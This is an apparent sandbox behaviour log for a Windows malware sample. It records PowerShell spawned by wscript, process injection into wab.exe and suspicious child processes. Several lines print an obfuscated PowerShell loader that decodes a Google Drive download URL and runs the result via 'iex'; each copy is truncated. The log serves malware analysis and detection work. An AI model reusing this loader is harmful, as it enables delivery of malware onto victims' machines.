Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2E40000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2E3FD78
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Spleniform225 = 1;$Figurskaaret='Substrin';$Figurskaaret+='g';Function Nepotistic($Mistnkeligt){$Conchuela=$Mistnkeligt.Length-$Spleniform225;For($Autometamorphosis=5; $Autometamorphosis -lt $Conchuela; $Autometamorphosis+=(6)){$Aversioners+=$Mistnkeligt.$Figurskaaret.Invoke($Autometamorphosis, $Spleniform225);}$Aversioners;}function Enrens($Klippehules135){&($grazable) ($Klippehules135);}$Wedelns=Nepotistic 'JuleeM Spiro NnnezLuthei In elDecenlTjuruakiloj/,itri5Euc l. Tuff0Chemi ,rond(PreciWTri,hiRoscon TreedAggraoElectwHabudsViv,e AboriNAartuTChae. Bekos1Babit0Kmpen.Inarm0 Mono;Dokum InnhoWbegrdiSkrydn,riva6 Bege4Sundh; Diag BenegxOvers6.umss4Sedim;Al id umbrOmforvOutwe:Stunt1Towns2Riddi1 ,osi.Spise0Dalc ) I,du UnintGE.itueDaakac Koffk KnigoCircu/,lnsn2.ount0Paahi1infur0 Effe0catal1udmat0D,wry1For o TeleFB,udbiUdst,r FormePart fKuponoduplixRedni/Part.1P.stn2 Slau1 Lase.Nonec0Milie ';$Bombiccite240=Nepotistic ' PdatURekursVarieeTriumrSmitt- FinfALog.egMisape P,ctnDomest Stor ';$Charger=Nepotistic ' uffohTest t Stent GranpLnmodsKa.to:rekto/Marli/Omnitd Uvilr Depridelsivanhugeves,i.BeirugColl o madro KlokgBeriglTeleuePun.i. Brysc H.tpo lempmSkeed/ Famiu,alsscSh pp?TungteMbelpxNicetptufteoPerivr E entCleme=Ana.sdTr,ldo Snknw Drean NonclD stooproviaLucradGo,sf&U.wraiDistodHindu=verse1Lakmuy Ber,sEmilsXM.rioS .nylWProgrc UgelkSi.de_ Bares p tihGobblf Jac,s V,riiDi stVBagerSI.nijvDuffbxVelv.1SlageUSit,sk UrolpPrintRTetraU Tyfu2VideoRSc,ot4VelarF Sa,kJTvrsk7 AfnakInscr8DemonZBenin ';$Indtgters=Nepotistic 'Aummb>Overe ';$grazable=Nepotistic 'NematiRe ule Yv rxHas.e ';$Skatteprocenters = Nepotistic 'SynsfeSmertcMytolh ManioPostb syste% Undea Skr pRlighpProcedG.umpa KbentSim laBioni%Socia\MenueU R tmd NorijWheezvOkto,nTurbueMonot. 
BahrMSubstaSymboi Fo k .ill&Pl,dg&Basar ObdureKur,ucTailbhHymenoCzari Ansig$Stil, ';Enrens (Nepotistic 'Josua$Um,akgGenialprevooCent.bDir.saTrdokl Gang: imalUalternKaithcdalevaWaltzvAa ele,gterranklanReheaoDispeuMontas Y arlBuffeyGlot.=Aften( Outgc IndemDagpld Co.p ,isav/EoniacPlagi .rek$StemmSBeredkLjendaSkrmmt.ormitVapo.eCentipOpsmnr eninoSubmicUnsules aglnSchultDesceeNedblrAnthrsF,uep) Lept ');Enrens (Nepotistic 'Selvs$TaarngPrerelUn.wioTeatebGall,aS atkl,dslu:ForbeS M notD stauFor efstinkf intriTentlnunseneFaglrsFikses Grim=Zaddi$ TempC B,reh BalaaThimbrLednig PerqeAcridr nexp.Serassfi.kapInvarlProbliBe,ent,aris(Venog$BacteI tligngabardAbandtJa,nig Horot.ndele CharrDi.gnsMydri)P.dic ');$Charger=$Stuffiness[0];Enrens (Nepotistic 'Tornf$ Palpg,paltlPreatoSp.llbcarp.a ,rtllSamvi:F,rvaFThundrKap taCemetndi,dlkStokklVarebiIntran Int,=RedseN ViceeBoligwDiarb-,latwOBamsebOmbytjNonsyeForlncVal.otStrea OverrSArnauy KulksImmuttJordreFr nkmBeren.UninwNStoreeKa ketTnger.Ep,grWOver,eOplgnbregenC Lr,ilNu,rei TroseTrompnBargetToles ');Enrens (Nepotistic ' Ovip$F.rmaFTrekorPett aKor enUnstokEndo,lAndefi ,aranStren.sta
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Udjvne.Mai && echo $"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Spleniform225 = 1;$Figurskaaret='Substrin';$Figurskaaret+='g';Function Nepotistic($Mistnkeligt){$Conchuela=$Mistnkeligt.Length-$Spleniform225;For($Autometamorphosis=5; $Autometamorphosis -lt $Conchuela; $Autometamorphosis+=(6)){$Aversioners+=$Mistnkeligt.$Figurskaaret.Invoke($Autometamorphosis, $Spleniform225);}$Aversioners;}function Enrens($Klippehules135){&($grazable) ($Klippehules135);}$Wedelns=Nepotistic 'JuleeM Spiro NnnezLuthei In elDecenlTjuruakiloj/,itri5Euc l. Tuff0Chemi ,rond(PreciWTri,hiRoscon TreedAggraoElectwHabudsViv,e AboriNAartuTChae. Bekos1Babit0Kmpen.Inarm0 Mono;Dokum InnhoWbegrdiSkrydn,riva6 Bege4Sundh; Diag BenegxOvers6.umss4Sedim;Al id umbrOmforvOutwe:Stunt1Towns2Riddi1 ,osi.Spise0Dalc ) I,du UnintGE.itueDaakac Koffk KnigoCircu/,lnsn2.ount0Paahi1infur0 Effe0catal1udmat0D,wry1For o TeleFB,udbiUdst,r FormePart fKuponoduplixRedni/Part.1P.stn2 Slau1 Lase.Nonec0Milie ';$Bombiccite240=Nepotistic ' PdatURekursVarieeTriumrSmitt- FinfALog.egMisape P,ctnDomest Stor ';$Charger=Nepotistic ' uffohTest t Stent GranpLnmodsKa.to:rekto/Marli/Omnitd Uvilr Depridelsivanhugeves,i.BeirugColl o madro KlokgBeriglTeleuePun.i. Brysc H.tpo lempmSkeed/ Famiu,alsscSh pp?TungteMbelpxNicetptufteoPerivr E entCleme=Ana.sdTr,ldo Snknw Drean NonclD stooproviaLucradGo,sf&U.wraiDistodHindu=verse1Lakmuy Ber,sEmilsXM.rioS .nylWProgrc UgelkSi.de_ Bares p tihGobblf Jac,s V,riiDi stVBagerSI.nijvDuffbxVelv.1SlageUSit,sk UrolpPrintRTetraU Tyfu2VideoRSc,ot4VelarF Sa,kJTvrsk7 AfnakInscr8DemonZBenin ';$Indtgters=Nepotistic 'Aummb>Overe ';$grazable=Nepotistic 'NematiRe ule Yv rxHas.e ';$Skatteprocenters = Nepotistic 'SynsfeSmertcMytolh ManioPostb syste% Undea Skr pRlighpProcedG.umpa KbentSim laBioni%Socia\MenueU R tmd NorijWheezvOkto,nTurbueMonot. 
BahrMSubstaSymboi Fo k .ill&Pl,dg&Basar ObdureKur,ucTailbhHymenoCzari Ansig$Stil, ';Enrens (Nepotistic 'Josua$Um,akgGenialprevooCent.bDir.saTrdokl Gang: imalUalternKaithcdalevaWaltzvAa ele,gterranklanReheaoDispeuMontas Y arlBuffeyGlot.=Aften( Outgc IndemDagpld Co.p ,isav/EoniacPlagi .rek$StemmSBeredkLjendaSkrmmt.ormitVapo.eCentipOpsmnr eninoSubmicUnsules aglnSchultDesceeNedblrAnthrsF,uep) Lept ');Enrens (Nepotistic 'Selvs$TaarngPrerelUn.wioTeatebGall,aS atkl,dslu:ForbeS M notD stauFor efstinkf intriTentlnunseneFaglrsFikses Grim=Zaddi$ TempC B,reh BalaaThimbrLednig PerqeAcridr nexp.Serassfi.kapInvarlProbliBe,ent,aris(Venog$BacteI tligngabardAbandtJa,nig Horot.ndele CharrDi.gnsMydri)P.dic ');$Charger=$Stuffiness[0];Enrens (Nepotistic 'Tornf$ Palpg,paltlPreatoSp.llbcarp.a ,rtllSamvi:F,rvaFThundrKap taCemetndi,dlkStokklVarebiIntran Int,=RedseN ViceeBoligwDiarb-,latwOBamsebOmbytjNonsyeForlncVal.otStrea OverrSArnauy KulksImmuttJordreFr nkmBeren.UninwNStoreeKa ketTnger.Ep,grWOver,eOplgnbregenC Lr,ilNu,rei TroseTrompnBargetToles ');Enrens (Nepotistic ' Ovip$F.rmaFTrekorPett aKor enUnstokEndo,lAndefi ,aranStren.sta
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Udjvne.Mai && echo $"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\SysWOW64\icacls.exe"
Source: C:\Windows\SysWOW64\icacls.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$spleniform225 = 1;$figurskaaret='substrin';$figurskaaret+='g';function nepotistic($mistnkeligt){$conchuela=$mistnkeligt.length-$spleniform225;for($autometamorphosis=5; $autometamorphosis -lt $conchuela; $autometamorphosis+=(6)){$aversioners+=$mistnkeligt.$figurskaaret.invoke($autometamorphosis, $spleniform225);}$aversioners;}function enrens($klippehules135){&($grazable) ($klippehules135);}$wedelns=nepotistic 'juleem spiro nnnezluthei in eldecenltjuruakiloj/,itri5euc l. tuff0chemi ,rond(preciwtri,hiroscon treedaggraoelectwhabudsviv,e aborinaartutchae. bekos1babit0kmpen.inarm0 mono;dokum innhowbegrdiskrydn,riva6 bege4sundh; diag benegxovers6.umss4sedim;al id umbromforvoutwe:stunt1towns2riddi1 ,osi.spise0dalc ) i,du unintge.ituedaakac koffk knigocircu/,lnsn2.ount0paahi1infur0 effe0catal1udmat0d,wry1for o telefb,udbiudst,r formepart fkuponoduplixredni/part.1p.stn2 slau1 lase.nonec0milie ';$bombiccite240=nepotistic ' pdaturekursvarieetriumrsmitt- finfalog.egmisape p,ctndomest stor ';$charger=nepotistic ' uffohtest t stent granplnmodska.to:rekto/marli/omnitd uvilr depridelsivanhugeves,i.beirugcoll o madro klokgberiglteleuepun.i. brysc h.tpo lempmskeed/ famiu,alsscsh pp?tungtembelpxnicetptufteoperivr e entcleme=ana.sdtr,ldo snknw drean noncld stooprovialucradgo,sf&u.wraidistodhindu=verse1lakmuy ber,semilsxm.rios .nylwprogrc ugelksi.de_ bares p tihgobblf jac,s v,riidi stvbagersi.nijvduffbxvelv.1slageusit,sk urolpprintrtetrau tyfu2videorsc,ot4velarf sa,kjtvrsk7 afnakinscr8demonzbenin ';$indtgters=nepotistic 'aummb>overe ';$grazable=nepotistic 'nematire ule yv rxhas.e ';$skatteprocenters = nepotistic 'synsfesmertcmytolh maniopostb syste% undea skr prlighpprocedg.umpa kbentsim labioni%socia\menueu r tmd norijwheezvokto,nturbuemonot. 
bahrmsubstasymboi fo k .ill&pl,dg&basar obdurekur,uctailbhhymenoczari ansig$stil, ';enrens (nepotistic 'josua$um,akggenialprevoocent.bdir.satrdokl gang: imalualternkaithcdalevawaltzvaa ele,gterranklanreheaodispeumontas y arlbuffeyglot.=aften( outgc indemdagpld co.p ,isav/eoniacplagi .rek$stemmsberedkljendaskrmmt.ormitvapo.ecentipopsmnr eninosubmicunsules aglnschultdesceenedblranthrsf,uep) lept ');enrens (nepotistic 'selvs$taarngprerelun.wioteatebgall,as atkl,dslu:forbes m notd staufor efstinkf intritentlnunsenefaglrsfikses grim=zaddi$ tempc b,reh balaathimbrlednig perqeacridr nexp.serassfi.kapinvarlproblibe,ent,aris(venog$bactei tligngabardabandtja,nig horot.ndele charrdi.gnsmydri)p.dic ');$charger=$stuffiness[0];enrens (nepotistic 'tornf$ palpg,paltlpreatosp.llbcarp.a ,rtllsamvi:f,rvafthundrkap tacemetndi,dlkstokklvarebiintran int,=redsen viceeboligwdiarb-,latwobamsebombytjnonsyeforlncval.otstrea overrsarnauy kulksimmuttjordrefr nkmberen.uninwnstoreeka kettnger.ep,grwover,eoplgnbregenc lr,ilnu,rei trosetrompnbargettoles ');enrens (nepotistic ' ovip$f.rmaftrekorpett akor enunstokendo,landefi ,aranstren.sta
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$spleniform225 = 1;$figurskaaret='substrin';$figurskaaret+='g';function nepotistic($mistnkeligt){$conchuela=$mistnkeligt.length-$spleniform225;for($autometamorphosis=5; $autometamorphosis -lt $conchuela; $autometamorphosis+=(6)){$aversioners+=$mistnkeligt.$figurskaaret.invoke($autometamorphosis, $spleniform225);}$aversioners;}function enrens($klippehules135){&($grazable) ($klippehules135);}$wedelns=nepotistic 'juleem spiro nnnezluthei in eldecenltjuruakiloj/,itri5euc l. tuff0chemi ,rond(preciwtri,hiroscon treedaggraoelectwhabudsviv,e aborinaartutchae. bekos1babit0kmpen.inarm0 mono;dokum innhowbegrdiskrydn,riva6 bege4sundh; diag benegxovers6.umss4sedim;al id umbromforvoutwe:stunt1towns2riddi1 ,osi.spise0dalc ) i,du unintge.ituedaakac koffk knigocircu/,lnsn2.ount0paahi1infur0 effe0catal1udmat0d,wry1for o telefb,udbiudst,r formepart fkuponoduplixredni/part.1p.stn2 slau1 lase.nonec0milie ';$bombiccite240=nepotistic ' pdaturekursvarieetriumrsmitt- finfalog.egmisape p,ctndomest stor ';$charger=nepotistic ' uffohtest t stent granplnmodska.to:rekto/marli/omnitd uvilr depridelsivanhugeves,i.beirugcoll o madro klokgberiglteleuepun.i. brysc h.tpo lempmskeed/ famiu,alsscsh pp?tungtembelpxnicetptufteoperivr e entcleme=ana.sdtr,ldo snknw drean noncld stooprovialucradgo,sf&u.wraidistodhindu=verse1lakmuy ber,semilsxm.rios .nylwprogrc ugelksi.de_ bares p tihgobblf jac,s v,riidi stvbagersi.nijvduffbxvelv.1slageusit,sk urolpprintrtetrau tyfu2videorsc,ot4velarf sa,kjtvrsk7 afnakinscr8demonzbenin ';$indtgters=nepotistic 'aummb>overe ';$grazable=nepotistic 'nematire ule yv rxhas.e ';$skatteprocenters = nepotistic 'synsfesmertcmytolh maniopostb syste% undea skr prlighpprocedg.umpa kbentsim labioni%socia\menueu r tmd norijwheezvokto,nturbuemonot. 
bahrmsubstasymboi fo k .ill&pl,dg&basar obdurekur,uctailbhhymenoczari ansig$stil, ';enrens (nepotistic 'josua$um,akggenialprevoocent.bdir.satrdokl gang: imalualternkaithcdalevawaltzvaa ele,gterranklanreheaodispeumontas y arlbuffeyglot.=aften( outgc indemdagpld co.p ,isav/eoniacplagi .rek$stemmsberedkljendaskrmmt.ormitvapo.ecentipopsmnr eninosubmicunsules aglnschultdesceenedblranthrsf,uep) lept ');enrens (nepotistic 'selvs$taarngprerelun.wioteatebgall,as atkl,dslu:forbes m notd staufor efstinkf intritentlnunsenefaglrsfikses grim=zaddi$ tempc b,reh balaathimbrlednig perqeacridr nexp.serassfi.kapinvarlproblibe,ent,aris(venog$bactei tligngabardabandtja,nig horot.ndele charrdi.gnsmydri)p.dic ');$charger=$stuffiness[0];enrens (nepotistic 'tornf$ palpg,paltlpreatosp.llbcarp.a ,rtllsamvi:f,rvafthundrkap tacemetndi,dlkstokklvarebiintran int,=redsen viceeboligwdiarb-,latwobamsebombytjnonsyeforlncval.otstrea overrsarnauy kulksimmuttjordrefr nkmberen.uninwnstoreeka kettnger.ep,grwover,eoplgnbregenc lr,ilnu,rei trosetrompnbargettoles ');enrens (nepotistic ' ovip$f.rmaftrekorpett akor enunstokendo,landefi ,aranstren.sta
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$spleniform225 = 1;$figurskaaret='substrin';$figurskaaret+='g';function nepotistic($mistnkeligt){$conchuela=$mistnkeligt.length-$spleniform225;for($autometamorphosis=5; $autometamorphosis -lt $conchuela; $autometamorphosis+=(6)){$aversioners+=$mistnkeligt.$figurskaaret.invoke($autometamorphosis, $spleniform225);}$aversioners;}function enrens($klippehules135){&($grazable) ($klippehules135);}$wedelns=nepotistic 'juleem spiro nnnezluthei in eldecenltjuruakiloj/,itri5euc l. tuff0chemi ,rond(preciwtri,hiroscon treedaggraoelectwhabudsviv,e aborinaartutchae. bekos1babit0kmpen.inarm0 mono;dokum innhowbegrdiskrydn,riva6 bege4sundh; diag benegxovers6.umss4sedim;al id umbromforvoutwe:stunt1towns2riddi1 ,osi.spise0dalc ) i,du unintge.ituedaakac koffk knigocircu/,lnsn2.ount0paahi1infur0 effe0catal1udmat0d,wry1for o telefb,udbiudst,r formepart fkuponoduplixredni/part.1p.stn2 slau1 lase.nonec0milie ';$bombiccite240=nepotistic ' pdaturekursvarieetriumrsmitt- finfalog.egmisape p,ctndomest stor ';$charger=nepotistic ' uffohtest t stent granplnmodska.to:rekto/marli/omnitd uvilr depridelsivanhugeves,i.beirugcoll o madro klokgberiglteleuepun.i. brysc h.tpo lempmskeed/ famiu,alsscsh pp?tungtembelpxnicetptufteoperivr e entcleme=ana.sdtr,ldo snknw drean noncld stooprovialucradgo,sf&u.wraidistodhindu=verse1lakmuy ber,semilsxm.rios .nylwprogrc ugelksi.de_ bares p tihgobblf jac,s v,riidi stvbagersi.nijvduffbxvelv.1slageusit,sk urolpprintrtetrau tyfu2videorsc,ot4velarf sa,kjtvrsk7 afnakinscr8demonzbenin ';$indtgters=nepotistic 'aummb>overe ';$grazable=nepotistic 'nematire ule yv rxhas.e ';$skatteprocenters = nepotistic 'synsfesmertcmytolh maniopostb syste% undea skr prlighpprocedg.umpa kbentsim labioni%socia\menueu r tmd norijwheezvokto,nturbuemonot. 
bahrmsubstasymboi fo k .ill&pl,dg&basar obdurekur,uctailbhhymenoczari ansig$stil, ';enrens (nepotistic 'josua$um,akggenialprevoocent.bdir.satrdokl gang: imalualternkaithcdalevawaltzvaa ele,gterranklanreheaodispeumontas y arlbuffeyglot.=aften( outgc indemdagpld co.p ,isav/eoniacplagi .rek$stemmsberedkljendaskrmmt.ormitvapo.ecentipopsmnr eninosubmicunsules aglnschultdesceenedblranthrsf,uep) lept ');enrens (nepotistic 'selvs$taarngprerelun.wioteatebgall,as atkl,dslu:forbes m notd staufor efstinkf intritentlnunsenefaglrsfikses grim=zaddi$ tempc b,reh balaathimbrlednig perqeacridr nexp.serassfi.kapinvarlproblibe,ent,aris(venog$bactei tligngabardabandtja,nig horot.ndele charrdi.gnsmydri)p.dic ');$charger=$stuffiness[0];enrens (nepotistic 'tornf$ palpg,paltlpreatosp.llbcarp.a ,rtllsamvi:f,rvafthundrkap tacemetndi,dlkstokklvarebiintran int,=redsen viceeboligwdiarb-,latwobamsebombytjnonsyeforlncval.otstrea overrsarnauy kulksimmuttjordrefr nkmberen.uninwnstoreeka kettnger.ep,grwover,eoplgnbregenc lr,ilnu,rei trosetrompnbargettoles ');enrens (nepotistic ' ovip$f.rmaftrekorpett akor enunstokendo,landefi ,aranstren.sta
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$spleniform225 = 1;$figurskaaret='substrin';$figurskaaret+='g';function nepotistic($mistnkeligt){$conchuela=$mistnkeligt.length-$spleniform225;for($autometamorphosis=5; $autometamorphosis -lt $conchuela; $autometamorphosis+=(6)){$aversioners+=$mistnkeligt.$figurskaaret.invoke($autometamorphosis, $spleniform225);}$aversioners;}function enrens($klippehules135){&($grazable) ($klippehules135);}$wedelns=nepotistic 'juleem spiro nnnezluthei in eldecenltjuruakiloj/,itri5euc l. tuff0chemi ,rond(preciwtri,hiroscon treedaggraoelectwhabudsviv,e aborinaartutchae. bekos1babit0kmpen.inarm0 mono;dokum innhowbegrdiskrydn,riva6 bege4sundh; diag benegxovers6.umss4sedim;al id umbromforvoutwe:stunt1towns2riddi1 ,osi.spise0dalc ) i,du unintge.ituedaakac koffk knigocircu/,lnsn2.ount0paahi1infur0 effe0catal1udmat0d,wry1for o telefb,udbiudst,r formepart fkuponoduplixredni/part.1p.stn2 slau1 lase.nonec0milie ';$bombiccite240=nepotistic ' pdaturekursvarieetriumrsmitt- finfalog.egmisape p,ctndomest stor ';$charger=nepotistic ' uffohtest t stent granplnmodska.to:rekto/marli/omnitd uvilr depridelsivanhugeves,i.beirugcoll o madro klokgberiglteleuepun.i. brysc h.tpo lempmskeed/ famiu,alsscsh pp?tungtembelpxnicetptufteoperivr e entcleme=ana.sdtr,ldo snknw drean noncld stooprovialucradgo,sf&u.wraidistodhindu=verse1lakmuy ber,semilsxm.rios .nylwprogrc ugelksi.de_ bares p tihgobblf jac,s v,riidi stvbagersi.nijvduffbxvelv.1slageusit,sk urolpprintrtetrau tyfu2videorsc,ot4velarf sa,kjtvrsk7 afnakinscr8demonzbenin ';$indtgters=nepotistic 'aummb>overe ';$grazable=nepotistic 'nematire ule yv rxhas.e ';$skatteprocenters = nepotistic 'synsfesmertcmytolh maniopostb syste% undea skr prlighpprocedg.umpa kbentsim labioni%socia\menueu r tmd norijwheezvokto,nturbuemonot. 
bahrmsubstasymboi fo k .ill&pl,dg&basar obdurekur,uctailbhhymenoczari ansig$stil, ';enrens (nepotistic 'josua$um,akggenialprevoocent.bdir.satrdokl gang: imalualternkaithcdalevawaltzvaa ele,gterranklanreheaodispeumontas y arlbuffeyglot.=aften( outgc indemdagpld co.p ,isav/eoniacplagi .rek$stemmsberedkljendaskrmmt.ormitvapo.ecentipopsmnr eninosubmicunsules aglnschultdesceenedblranthrsf,uep) lept ');enrens (nepotistic 'selvs$taarngprerelun.wioteatebgall,as atkl,dslu:forbes m notd staufor efstinkf intritentlnunsenefaglrsfikses grim=zaddi$ tempc b,reh balaathimbrlednig perqeacridr nexp.serassfi.kapinvarlproblibe,ent,aris(venog$bactei tligngabardabandtja,nig horot.ndele charrdi.gnsmydri)p.dic ');$charger=$stuffiness[0];enrens (nepotistic 'tornf$ palpg,paltlpreatosp.llbcarp.a ,rtllsamvi:f,rvafthundrkap tacemetndi,dlkstokklvarebiintran int,=redsen viceeboligwdiarb-,latwobamsebombytjnonsyeforlncval.otstrea overrsarnauy kulksimmuttjordrefr nkmberen.uninwnstoreeka kettnger.ep,grwover,eoplgnbregenc lr,ilnu,rei trosetrompnbargettoles ');enrens (nepotistic ' ovip$f.rmaftrekorpett akor enunstokendo,landefi ,aranstren.sta
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
